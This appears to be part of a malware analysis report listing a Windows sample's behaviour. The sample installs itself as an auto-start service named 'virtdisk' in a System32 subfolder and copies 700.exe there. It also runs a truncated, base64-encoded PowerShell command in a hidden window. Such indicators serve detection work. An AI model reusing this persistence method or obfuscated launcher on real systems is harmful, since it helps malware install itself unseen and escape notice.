Technical information
- [<HKLM>\System\CurrentControlSet\Services\virtdisk] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\virtdisk] 'ImagePath' = '"<SYSTEM32>\RelPost\virtdisk.exe"'
- 'virtdisk' "<SYSTEM32>\RelPost\virtdisk.exe"
- 'virtdisk' <SYSTEM32>\RelPost\virtdisk.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAFMASQBKAFcAbQByAHMAPQAnAFYAVwBWAEsASgBmAHAAaAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAdQBgAFIASQB0AFkAcAByAG8AVABPAEMAbwBMACIAIAA9AC...
- %HOMEPATH%\700.exe
- <SYSTEM32>\relpost\virtdisk.exe
- %HOMEPATH%\700.exe to <SYSTEM32>\relpost\virtdisk.exe
- '%HOMEPATH%\700.exe'
- '<SYSTEM32>\relpost\virtdisk.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAFMASQBKAFcAbQByAHMAPQAnAFYAVwBWAEsASgBmAHAAaAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAdQBgAFIASQB0AFkAcAByAG8AVABPAEMAbwBMACIAIAA9AC...' (with a hidden window)